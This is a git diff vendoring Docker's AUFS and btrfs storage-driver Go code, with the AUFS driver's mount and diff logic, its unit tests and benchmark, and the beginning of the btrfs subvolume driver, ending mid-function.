+func (a *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) { + p := path.Join(a.rootPath(), "diff", id) + return fileGetNilCloser{storage.NewPathFileGetter(p)}, nil +} + +func (a *Driver) applyDiff(id string, diff io.Reader) error { + return chrootarchive.UntarUncompressed(diff, path.Join(a.rootPath(), "diff", id), &archive.TarOptions{ + UIDMaps: a.uidMaps, + GIDMaps: a.gidMaps, + }) +} + +// DiffSize calculates the changes between the specified id +// and its parent and returns the size in bytes of the changes +// relative to its base filesystem directory. +func (a *Driver) DiffSize(id, parent string) (size int64, err error) { + if !a.isParent(id, parent) { + return a.naiveDiff.DiffSize(id, parent) + } + // AUFS doesn't need the parent layer to calculate the diff size. + return directory.Size(path.Join(a.rootPath(), "diff", id)) +} + +// ApplyDiff extracts the changeset from the given diff into the +// layer with the specified id and parent, returning the size of the +// new layer in bytes. +func (a *Driver) ApplyDiff(id, parent string, diff io.Reader) (size int64, err error) { + if !a.isParent(id, parent) { + return a.naiveDiff.ApplyDiff(id, parent, diff) + } + + // AUFS doesn't need the parent id to apply the diff if it is the direct parent. + if err = a.applyDiff(id, diff); err != nil { + return + } + + return a.DiffSize(id, parent) +} + +// Changes produces a list of changes between the specified layer +// and its parent layer. If parent is "", then all changes will be ADD changes. +func (a *Driver) Changes(id, parent string) ([]archive.Change, error) { + if !a.isParent(id, parent) { + return a.naiveDiff.Changes(id, parent) + } + + // AUFS doesn't have snapshots, so we need to get changes from all parent + // layers. 
+ layers, err := a.getParentLayerPaths(id) + if err != nil { + return nil, err + } + return archive.Changes(layers, path.Join(a.rootPath(), "diff", id)) +} + +func (a *Driver) getParentLayerPaths(id string) ([]string, error) { + parentIds, err := getParentIDs(a.rootPath(), id) + if err != nil { + return nil, err + } + layers := make([]string, len(parentIds)) + + // Get the diff paths for all the parent ids + for i, p := range parentIds { + layers[i] = path.Join(a.rootPath(), "diff", p) + } + return layers, nil +} + +func (a *Driver) mount(id string, target string, mountLabel string, layers []string) error { + a.Lock() + defer a.Unlock() + + // If the id is mounted or we get an error return + if mounted, err := a.mounted(target); err != nil || mounted { + return err + } + + rw := a.getDiffPath(id) + + if err := a.aufsMount(layers, rw, target, mountLabel); err != nil { + return fmt.Errorf("error creating aufs mount to %s: %v", target, err) + } + return nil +} + +func (a *Driver) unmount(mountPath string) error { + a.Lock() + defer a.Unlock() + + if mounted, err := a.mounted(mountPath); err != nil || !mounted { + return err + } + if err := Unmount(mountPath); err != nil { + return err + } + return nil +} + +func (a *Driver) mounted(mountpoint string) (bool, error) { + return graphdriver.Mounted(graphdriver.FsMagicAufs, mountpoint) +} + +// Cleanup aufs and unmount all mountpoints +func (a *Driver) Cleanup() error { + var dirs []string + if err := filepath.Walk(a.mntPath(), func(path string, info os.FileInfo, err error) error { + if err != nil { + return err + } + if !info.IsDir() { + return nil + } + dirs = append(dirs, path) + return nil + }); err != nil { + return err + } + + for _, m := range dirs { + if err := a.unmount(m); err != nil { + logrus.Debugf("aufs error unmounting %s: %s", m, err) + } + } + return mountpk.Unmount(a.root) +} + +func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err error) { + defer func() { + if err != nil { + 
Unmount(target) + } + }() + + // Mount options are clipped to page size(4096 bytes). If there are more + // layers then these are remounted individually using append. + + offset := 54 + if useDirperm() { + offset += len("dirperm1") + } + b := make([]byte, syscall.Getpagesize()-len(mountLabel)-offset) // room for xino & mountLabel + bp := copy(b, fmt.Sprintf("br:%s=rw", rw)) + + index := 0 + for ; index < len(ro); index++ { + layer := fmt.Sprintf(":%s=ro+wh", ro[index]) + if bp+len(layer) > len(b) { + break + } + bp += copy(b[bp:], layer) + } + + opts := "dio,xino=/dev/shm/aufs.xino" + if useDirperm() { + opts += ",dirperm1" + } + data := label.FormatMountLabel(fmt.Sprintf("%s,%s", string(b[:bp]), opts), mountLabel) + if err = mount("none", target, "aufs", 0, data); err != nil { + return + } + + for ; index < len(ro); index++ { + layer := fmt.Sprintf(":%s=ro+wh", ro[index]) + data := label.FormatMountLabel(fmt.Sprintf("append%s", layer), mountLabel) + if err = mount("none", target, "aufs", syscall.MS_REMOUNT, data); err != nil { + return + } + } + + return +} + +// useDirperm checks dirperm1 mount option can be used with the current +// version of aufs. 
+func useDirperm() bool { + enableDirpermLock.Do(func() { + base, err := ioutil.TempDir("", "docker-aufs-base") + if err != nil { + logrus.Errorf("error checking dirperm1: %v", err) + return + } + defer os.RemoveAll(base) + + union, err := ioutil.TempDir("", "docker-aufs-union") + if err != nil { + logrus.Errorf("error checking dirperm1: %v", err) + return + } + defer os.RemoveAll(union) + + opts := fmt.Sprintf("br:%s,dirperm1,xino=/dev/shm/aufs.xino", base) + if err := mount("none", union, "aufs", 0, opts); err != nil { + return + } + enableDirperm = true + if err := Unmount(union); err != nil { + logrus.Errorf("error checking dirperm1: failed to unmount %v", err) + } + }) + return enableDirperm +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go new file mode 100644 index 0000000000..dc3c6a392b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go @@ -0,0 +1,802 @@ +// +build linux + +package aufs + +import ( + "crypto/sha256" + "encoding/hex" + "fmt" + "io/ioutil" + "os" + "path" + "sync" + "testing" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" + "github.com/docker/docker/pkg/stringid" +) + +var ( + tmpOuter = path.Join(os.TempDir(), "aufs-tests") + tmp = path.Join(tmpOuter, "aufs") +) + +func init() { + reexec.Init() +} + +func testInit(dir string, t testing.TB) graphdriver.Driver { + d, err := Init(dir, nil, nil, nil) + if err != nil { + if err == graphdriver.ErrNotSupported { + t.Skip(err) + } else { + t.Fatal(err) + } + } + return d +} + +func newDriver(t testing.TB) *Driver { + if err := os.MkdirAll(tmp, 0755); err != nil { + t.Fatal(err) + } + + d := testInit(tmp, t) + return d.(*Driver) +} + +func TestNewDriver(t *testing.T) { + if err := os.MkdirAll(tmp, 0755); err != nil { + t.Fatal(err) + } + + d := testInit(tmp, t) + defer 
os.RemoveAll(tmp) + if d == nil { + t.Fatalf("Driver should not be nil") + } +} + +func TestAufsString(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if d.String() != "aufs" { + t.Fatalf("Expected aufs got %s", d.String()) + } +} + +func TestCreateDirStructure(t *testing.T) { + newDriver(t) + defer os.RemoveAll(tmp) + + paths := []string{ + "mnt", + "layers", + "diff", + } + + for _, p := range paths { + if _, err := os.Stat(path.Join(tmp, p)); err != nil { + t.Fatal(err) + } + } +} + +// We should be able to create two drivers with the same dir structure +func TestNewDriverFromExistingDir(t *testing.T) { + if err := os.MkdirAll(tmp, 0755); err != nil { + t.Fatal(err) + } + + testInit(tmp, t) + testInit(tmp, t) + os.RemoveAll(tmp) +} + +func TestCreateNewDir(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } +} + +func TestCreateNewDirStructure(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + paths := []string{ + "mnt", + "diff", + "layers", + } + + for _, p := range paths { + if _, err := os.Stat(path.Join(tmp, p, "1")); err != nil { + t.Fatal(err) + } + } +} + +func TestRemoveImage(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + if err := d.Remove("1"); err != nil { + t.Fatal(err) + } + + paths := []string{ + "mnt", + "diff", + "layers", + } + + for _, p := range paths { + if _, err := os.Stat(path.Join(tmp, p, "1")); err == nil { + t.Fatalf("Error should not be nil because dirs with id 1 should be delted: %s", p) + } + } +} + +func TestGetWithoutParent(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + diffPath, err := d.Get("1", "") + if err != nil { + t.Fatal(err) + } + expected := path.Join(tmp, "diff", 
"1") + if diffPath != expected { + t.Fatalf("Expected path %s got %s", expected, diffPath) + } +} + +func TestCleanupWithNoDirs(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Cleanup(); err != nil { + t.Fatal(err) + } +} + +func TestCleanupWithDir(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + if err := d.Cleanup(); err != nil { + t.Fatal(err) + } +} + +func TestMountedFalseResponse(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + response, err := d.mounted(d.getDiffPath("1")) + if err != nil { + t.Fatal(err) + } + + if response != false { + t.Fatalf("Response if dir id 1 is mounted should be false") + } +} + +func TestMountedTrueReponse(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + if err := d.Create("2", "1", nil); err != nil { + t.Fatal(err) + } + + _, err := d.Get("2", "") + if err != nil { + t.Fatal(err) + } + + response, err := d.mounted(d.pathCache["2"]) + if err != nil { + t.Fatal(err) + } + + if response != true { + t.Fatalf("Response if dir id 2 is mounted should be true") + } +} + +func TestMountWithParent(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + if err := d.Create("2", "1", nil); err != nil { + t.Fatal(err) + } + + defer func() { + if err := d.Cleanup(); err != nil { + t.Fatal(err) + } + }() + + mntPath, err := d.Get("2", "") + if err != nil { + t.Fatal(err) + } + if mntPath == "" { + t.Fatal("mntPath should not be empty string") + } + + expected := path.Join(tmp, "mnt", "2") + if mntPath != expected { + t.Fatalf("Expected %s got %s", expected, mntPath) + } +} + +func TestRemoveMountedDir(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + 
if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + if err := d.Create("2", "1", nil); err != nil { + t.Fatal(err) + } + + defer func() { + if err := d.Cleanup(); err != nil { + t.Fatal(err) + } + }() + + mntPath, err := d.Get("2", "") + if err != nil { + t.Fatal(err) + } + if mntPath == "" { + t.Fatal("mntPath should not be empty string") + } + + mounted, err := d.mounted(d.pathCache["2"]) + if err != nil { + t.Fatal(err) + } + + if !mounted { + t.Fatalf("Dir id 2 should be mounted") + } + + if err := d.Remove("2"); err != nil { + t.Fatal(err) + } +} + +func TestCreateWithInvalidParent(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "docker", nil); err == nil { + t.Fatalf("Error should not be nil with parent does not exist") + } +} + +func TestGetDiff(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.CreateReadWrite("1", "", nil); err != nil { + t.Fatal(err) + } + + diffPath, err := d.Get("1", "") + if err != nil { + t.Fatal(err) + } + + // Add a file to the diff path with a fixed size + size := int64(1024) + + f, err := os.Create(path.Join(diffPath, "test_file")) + if err != nil { + t.Fatal(err) + } + if err := f.Truncate(size); err != nil { + t.Fatal(err) + } + f.Close() + + a, err := d.Diff("1", "") + if err != nil { + t.Fatal(err) + } + if a == nil { + t.Fatalf("Archive should not be nil") + } +} + +func TestChanges(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + if err := d.CreateReadWrite("2", "1", nil); err != nil { + t.Fatal(err) + } + + defer func() { + if err := d.Cleanup(); err != nil { + t.Fatal(err) + } + }() + + mntPoint, err := d.Get("2", "") + if err != nil { + t.Fatal(err) + } + + // Create a file to save in the mountpoint + f, err := os.Create(path.Join(mntPoint, "test.txt")) + if err != nil { + t.Fatal(err) + } + + if _, err := f.WriteString("testline"); err != nil { + 
t.Fatal(err) + } + if err := f.Close(); err != nil { + t.Fatal(err) + } + + changes, err := d.Changes("2", "") + if err != nil { + t.Fatal(err) + } + if len(changes) != 1 { + t.Fatalf("Dir 2 should have one change from parent got %d", len(changes)) + } + change := changes[0] + + expectedPath := "/test.txt" + if change.Path != expectedPath { + t.Fatalf("Expected path %s got %s", expectedPath, change.Path) + } + + if change.Kind != archive.ChangeAdd { + t.Fatalf("Change kind should be ChangeAdd got %s", change.Kind) + } + + if err := d.CreateReadWrite("3", "2", nil); err != nil { + t.Fatal(err) + } + mntPoint, err = d.Get("3", "") + if err != nil { + t.Fatal(err) + } + + // Create a file to save in the mountpoint + f, err = os.Create(path.Join(mntPoint, "test2.txt")) + if err != nil { + t.Fatal(err) + } + + if _, err := f.WriteString("testline"); err != nil { + t.Fatal(err) + } + if err := f.Close(); err != nil { + t.Fatal(err) + } + + changes, err = d.Changes("3", "2") + if err != nil { + t.Fatal(err) + } + + if len(changes) != 1 { + t.Fatalf("Dir 2 should have one change from parent got %d", len(changes)) + } + change = changes[0] + + expectedPath = "/test2.txt" + if change.Path != expectedPath { + t.Fatalf("Expected path %s got %s", expectedPath, change.Path) + } + + if change.Kind != archive.ChangeAdd { + t.Fatalf("Change kind should be ChangeAdd got %s", change.Kind) + } +} + +func TestDiffSize(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + + if err := d.CreateReadWrite("1", "", nil); err != nil { + t.Fatal(err) + } + + diffPath, err := d.Get("1", "") + if err != nil { + t.Fatal(err) + } + + // Add a file to the diff path with a fixed size + size := int64(1024) + + f, err := os.Create(path.Join(diffPath, "test_file")) + if err != nil { + t.Fatal(err) + } + if err := f.Truncate(size); err != nil { + t.Fatal(err) + } + s, err := f.Stat() + if err != nil { + t.Fatal(err) + } + size = s.Size() + if err := f.Close(); err != nil { + t.Fatal(err) + } + 
+ diffSize, err := d.DiffSize("1", "") + if err != nil { + t.Fatal(err) + } + if diffSize != size { + t.Fatalf("Expected size to be %d got %d", size, diffSize) + } +} + +func TestChildDiffSize(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + if err := d.CreateReadWrite("1", "", nil); err != nil { + t.Fatal(err) + } + + diffPath, err := d.Get("1", "") + if err != nil { + t.Fatal(err) + } + + // Add a file to the diff path with a fixed size + size := int64(1024) + + f, err := os.Create(path.Join(diffPath, "test_file")) + if err != nil { + t.Fatal(err) + } + if err := f.Truncate(size); err != nil { + t.Fatal(err) + } + s, err := f.Stat() + if err != nil { + t.Fatal(err) + } + size = s.Size() + if err := f.Close(); err != nil { + t.Fatal(err) + } + + diffSize, err := d.DiffSize("1", "") + if err != nil { + t.Fatal(err) + } + if diffSize != size { + t.Fatalf("Expected size to be %d got %d", size, diffSize) + } + + if err := d.Create("2", "1", nil); err != nil { + t.Fatal(err) + } + + diffSize, err = d.DiffSize("2", "1") + if err != nil { + t.Fatal(err) + } + // The diff size for the child should be zero + if diffSize != 0 { + t.Fatalf("Expected size to be %d got %d", 0, diffSize) + } +} + +func TestExists(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + if d.Exists("none") { + t.Fatal("id none should not exist in the driver") + } + + if !d.Exists("1") { + t.Fatal("id 1 should exist in the driver") + } +} + +func TestStatus(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + if err := d.Create("1", "", nil); err != nil { + t.Fatal(err) + } + + status := d.Status() + if status == nil || len(status) == 0 { + t.Fatal("Status should not be nil or empty") + } + rootDir := status[0] + dirs := status[2] + if rootDir[0] != "Root Dir" { + t.Fatalf("Expected Root Dir got %s", rootDir[0]) + } + if 
rootDir[1] != d.rootPath() { + t.Fatalf("Expected %s got %s", d.rootPath(), rootDir[1]) + } + if dirs[0] != "Dirs" { + t.Fatalf("Expected Dirs got %s", dirs[0]) + } + if dirs[1] != "1" { + t.Fatalf("Expected 1 got %s", dirs[1]) + } +} + +func TestApplyDiff(t *testing.T) { + d := newDriver(t) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + if err := d.CreateReadWrite("1", "", nil); err != nil { + t.Fatal(err) + } + + diffPath, err := d.Get("1", "") + if err != nil { + t.Fatal(err) + } + + // Add a file to the diff path with a fixed size + size := int64(1024) + + f, err := os.Create(path.Join(diffPath, "test_file")) + if err != nil { + t.Fatal(err) + } + if err := f.Truncate(size); err != nil { + t.Fatal(err) + } + f.Close() + + diff, err := d.Diff("1", "") + if err != nil { + t.Fatal(err) + } + + if err := d.Create("2", "", nil); err != nil { + t.Fatal(err) + } + if err := d.Create("3", "2", nil); err != nil { + t.Fatal(err) + } + + if err := d.applyDiff("3", diff); err != nil { + t.Fatal(err) + } + + // Ensure that the file is in the mount point for id 3 + + mountPoint, err := d.Get("3", "") + if err != nil { + t.Fatal(err) + } + if _, err := os.Stat(path.Join(mountPoint, "test_file")); err != nil { + t.Fatal(err) + } +} + +func hash(c string) string { + h := sha256.New() + fmt.Fprint(h, c) + return hex.EncodeToString(h.Sum(nil)) +} + +func testMountMoreThan42Layers(t *testing.T, mountPath string) { + if err := os.MkdirAll(mountPath, 0755); err != nil { + t.Fatal(err) + } + + defer os.RemoveAll(mountPath) + d := testInit(mountPath, t).(*Driver) + defer d.Cleanup() + var last string + var expected int + + for i := 1; i < 127; i++ { + expected++ + var ( + parent = fmt.Sprintf("%d", i-1) + current = fmt.Sprintf("%d", i) + ) + + if parent == "0" { + parent = "" + } else { + parent = hash(parent) + } + current = hash(current) + + if err := d.CreateReadWrite(current, parent, nil); err != nil { + t.Logf("Current layer %d", i) + t.Error(err) + } + point, err := 
d.Get(current, "") + if err != nil { + t.Logf("Current layer %d", i) + t.Error(err) + } + f, err := os.Create(path.Join(point, current)) + if err != nil { + t.Logf("Current layer %d", i) + t.Error(err) + } + f.Close() + + if i%10 == 0 { + if err := os.Remove(path.Join(point, parent)); err != nil { + t.Logf("Current layer %d", i) + t.Error(err) + } + expected-- + } + last = current + } + + // Perform the actual mount for the top most image + point, err := d.Get(last, "") + if err != nil { + t.Error(err) + } + files, err := ioutil.ReadDir(point) + if err != nil { + t.Error(err) + } + if len(files) != expected { + t.Errorf("Expected %d got %d", expected, len(files)) + } +} + +func TestMountMoreThan42Layers(t *testing.T) { + os.RemoveAll(tmpOuter) + testMountMoreThan42Layers(t, tmp) +} + +func TestMountMoreThan42LayersMatchingPathLength(t *testing.T) { + defer os.RemoveAll(tmpOuter) + zeroes := "0" + for { + // This finds a mount path so that when combined into aufs mount options + // 4096 byte boundary would be in between the paths or in permission + // section. 
For '/tmp' it will use '/tmp/aufs-tests/00000000/aufs' + mountPath := path.Join(tmpOuter, zeroes, "aufs") + pathLength := 77 + len(mountPath) + + if mod := 4095 % pathLength; mod == 0 || mod > pathLength-2 { + t.Logf("Using path: %s", mountPath) + testMountMoreThan42Layers(t, mountPath) + return + } + zeroes += "0" + } +} + +func BenchmarkConcurrentAccess(b *testing.B) { + b.StopTimer() + b.ResetTimer() + + d := newDriver(b) + defer os.RemoveAll(tmp) + defer d.Cleanup() + + numConcurent := 256 + // create a bunch of ids + var ids []string + for i := 0; i < numConcurent; i++ { + ids = append(ids, stringid.GenerateNonCryptoID()) + } + + if err := d.Create(ids[0], "", nil); err != nil { + b.Fatal(err) + } + + if err := d.Create(ids[1], ids[0], nil); err != nil { + b.Fatal(err) + } + + parent := ids[1] + ids = append(ids[2:]) + + chErr := make(chan error, numConcurent) + var outerGroup sync.WaitGroup + outerGroup.Add(len(ids)) + b.StartTimer() + + // here's the actual bench + for _, id := range ids { + go func(id string) { + defer outerGroup.Done() + if err := d.Create(id, parent, nil); err != nil { + b.Logf("Create %s failed", id) + chErr <- err + return + } + var innerGroup sync.WaitGroup + for i := 0; i < b.N; i++ { + innerGroup.Add(1) + go func() { + d.Get(id, "") + d.Put(id) + innerGroup.Done() + }() + } + innerGroup.Wait() + d.Remove(id) + }(id) + } + + outerGroup.Wait() + b.StopTimer() + close(chErr) + for err := range chErr { + if err != nil { + b.Log(err) + b.Fail() + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go new file mode 100644 index 0000000000..d2325fc46c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go @@ -0,0 +1,64 @@ +// +build linux + +package aufs + +import ( + "bufio" + "io/ioutil" + "os" + "path" +) + +// Return all the directories +func loadIds(root string) ([]string, error) { + dirs, err := 
ioutil.ReadDir(root) + if err != nil { + return nil, err + } + out := []string{} + for _, d := range dirs { + if !d.IsDir() { + out = append(out, d.Name()) + } + } + return out, nil +} + +// Read the layers file for the current id and return all the +// layers represented by new lines in the file +// +// If there are no lines in the file then the id has no parent +// and an empty slice is returned. +func getParentIDs(root, id string) ([]string, error) { + f, err := os.Open(path.Join(root, "layers", id)) + if err != nil { + return nil, err + } + defer f.Close() + + out := []string{} + s := bufio.NewScanner(f) + + for s.Scan() { + if t := s.Text(); t != "" { + out = append(out, s.Text()) + } + } + return out, s.Err() +} + +func (a *Driver) getMountpoint(id string) string { + return path.Join(a.mntPath(), id) +} + +func (a *Driver) mntPath() string { + return path.Join(a.rootPath(), "mnt") +} + +func (a *Driver) getDiffPath(id string) string { + return path.Join(a.diffPath(), id) +} + +func (a *Driver) diffPath() string { + return path.Join(a.rootPath(), "diff") +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go new file mode 100644 index 0000000000..da1e892f44 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go @@ -0,0 +1,21 @@ +// +build linux + +package aufs + +import ( + "os/exec" + "syscall" + + "github.com/Sirupsen/logrus" +) + +// Unmount the target specified. 
+func Unmount(target string) error { + if err := exec.Command("auplink", target, "flush").Run(); err != nil { + logrus.Warnf("Couldn't run auplink before unmount %s: %s", target, err) + } + if err := syscall.Unmount(target, 0); err != nil { + return err + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go new file mode 100644 index 0000000000..8062bae420 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go @@ -0,0 +1,7 @@ +package aufs + +import "syscall" + +func mount(source string, target string, fstype string, flags uintptr, data string) error { + return syscall.Mount(source, target, fstype, flags, data) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go new file mode 100644 index 0000000000..d030b06637 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go @@ -0,0 +1,12 @@ +// +build !linux + +package aufs + +import "errors" + +// MsRemount declared to specify a non-linux system mount. 
+const MsRemount = 0 + +func mount(source string, target string, fstype string, flags uintptr, data string) (err error) { + return errors.New("mount is not implemented on this platform") +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go new file mode 100644 index 0000000000..44420f11a7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go @@ -0,0 +1,530 @@ +// +build linux + +package btrfs + +/* +#include +#include +#include +#include + +static void set_name_btrfs_ioctl_vol_args_v2(struct btrfs_ioctl_vol_args_v2* btrfs_struct, const char* value) { + snprintf(btrfs_struct->name, BTRFS_SUBVOL_NAME_MAX, "%s", value); +} +*/ +import "C" + +import ( + "fmt" + "os" + "path" + "path/filepath" + "strings" + "syscall" + "unsafe" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/go-units" + "github.com/opencontainers/runc/libcontainer/label" +) + +func init() { + graphdriver.Register("btrfs", Init) +} + +var ( + quotaEnabled = false + userDiskQuota = false +) + +type btrfsOptions struct { + minSpace uint64 + size uint64 +} + +// Init returns a new BTRFS driver. +// An error is returned if BTRFS is not supported. 
+func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + + fsMagic, err := graphdriver.GetFSMagic(home) + if err != nil { + return nil, err + } + + if fsMagic != graphdriver.FsMagicBtrfs { + return nil, graphdriver.ErrPrerequisites + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil { + return nil, err + } + + if err := mount.MakePrivate(home); err != nil { + return nil, err + } + + opt, err := parseOptions(options) + if err != nil { + return nil, err + } + + if userDiskQuota { + if err := subvolEnableQuota(home); err != nil { + return nil, err + } + quotaEnabled = true + } + + driver := &Driver{ + home: home, + uidMaps: uidMaps, + gidMaps: gidMaps, + options: opt, + } + + return graphdriver.NewNaiveDiffDriver(driver, uidMaps, gidMaps), nil +} + +func parseOptions(opt []string) (btrfsOptions, error) { + var options btrfsOptions + for _, option := range opt { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return options, err + } + key = strings.ToLower(key) + switch key { + case "btrfs.min_space": + minSpace, err := units.RAMInBytes(val) + if err != nil { + return options, err + } + userDiskQuota = true + options.minSpace = uint64(minSpace) + default: + return options, fmt.Errorf("Unknown option %s", key) + } + } + return options, nil +} + +// Driver contains information about the filesystem mounted. +type Driver struct { + //root of the file system + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + options btrfsOptions +} + +// String prints the name of the driver (btrfs). +func (d *Driver) String() string { + return "btrfs" +} + +// Status returns current driver information in a two dimensional string array. +// Output contains "Build Version" and "Library Version" of the btrfs libraries used. 
+// Version information can be used to check compatibility with your kernel. +func (d *Driver) Status() [][2]string { + status := [][2]string{} + if bv := btrfsBuildVersion(); bv != "-" { + status = append(status, [2]string{"Build Version", bv}) + } + if lv := btrfsLibVersion(); lv != -1 { + status = append(status, [2]string{"Library Version", fmt.Sprintf("%d", lv)}) + } + return status +} + +// GetMetadata returns empty metadata for this driver. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + return nil, nil +} + +// Cleanup unmounts the home directory. +func (d *Driver) Cleanup() error { + if quotaEnabled { + if err := subvolDisableQuota(d.home); err != nil { + return err + } + } + + return mount.Unmount(d.home) +} + +func free(p *C.char) { + C.free(unsafe.Pointer(p)) +} + +func openDir(path string) (*C.DIR, error) { + Cpath := C.CString(path) + defer free(Cpath) + + dir := C.opendir(Cpath) + if dir == nil { + return nil, fmt.Errorf("Can't open dir") + } + return dir, nil +} + +func closeDir(dir *C.DIR) { + if dir != nil { + C.closedir(dir) + } +} + +func getDirFd(dir *C.DIR) uintptr { + return uintptr(C.dirfd(dir)) +} + +func subvolCreate(path, name string) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_vol_args + for i, c := range []byte(name) { + args.name[i] = C.char(c) + } + + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SUBVOL_CREATE, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to create btrfs subvolume: %v", errno.Error()) + } + return nil +} + +func subvolSnapshot(src, dest, name string) error { + srcDir, err := openDir(src) + if err != nil { + return err + } + defer closeDir(srcDir) + + destDir, err := openDir(dest) + if err != nil { + return err + } + defer closeDir(destDir) + + var args C.struct_btrfs_ioctl_vol_args_v2 + args.fd = C.__s64(getDirFd(srcDir)) + + var cs = 
C.CString(name) + C.set_name_btrfs_ioctl_vol_args_v2(&args, cs) + C.free(unsafe.Pointer(cs)) + + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(destDir), C.BTRFS_IOC_SNAP_CREATE_V2, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to create btrfs snapshot: %v", errno.Error()) + } + return nil +} + +func isSubvolume(p string) (bool, error) { + var bufStat syscall.Stat_t + if err := syscall.Lstat(p, &bufStat); err != nil { + return false, err + } + + // return true if it is a btrfs subvolume + return bufStat.Ino == C.BTRFS_FIRST_FREE_OBJECTID, nil +} + +func subvolDelete(dirpath, name string) error { + dir, err := openDir(dirpath) + if err != nil { + return err + } + defer closeDir(dir) + fullPath := path.Join(dirpath, name) + + var args C.struct_btrfs_ioctl_vol_args + + // walk the btrfs subvolumes + walkSubvolumes := func(p string, f os.FileInfo, err error) error { + if err != nil { + if os.IsNotExist(err) && p != fullPath { + // missing most likely because the path was a subvolume that got removed in the previous iteration + // since it's gone anyway, we don't care + return nil + } + return fmt.Errorf("error walking subvolumes: %v", err) + } + // we want to check children only so skip itself + // it will be removed after the filepath walk anyways + if f.IsDir() && p != fullPath { + sv, err := isSubvolume(p) + if err != nil { + return fmt.Errorf("Failed to test if %s is a btrfs subvolume: %v", p, err) + } + if sv { + if err := subvolDelete(path.Dir(p), f.Name()); err != nil { + return fmt.Errorf("Failed to destroy btrfs child subvolume (%s) of parent (%s): %v", p, dirpath, err) + } + } + } + return nil + } + if err := filepath.Walk(path.Join(dirpath, name), walkSubvolumes); err != nil { + return fmt.Errorf("Recursively walking subvolumes for %s failed: %v", dirpath, err) + } + + // all subvolumes have been removed + // now remove the one originally passed in + for i, c := range []byte(name) { + args.name[i] = C.char(c) + } 
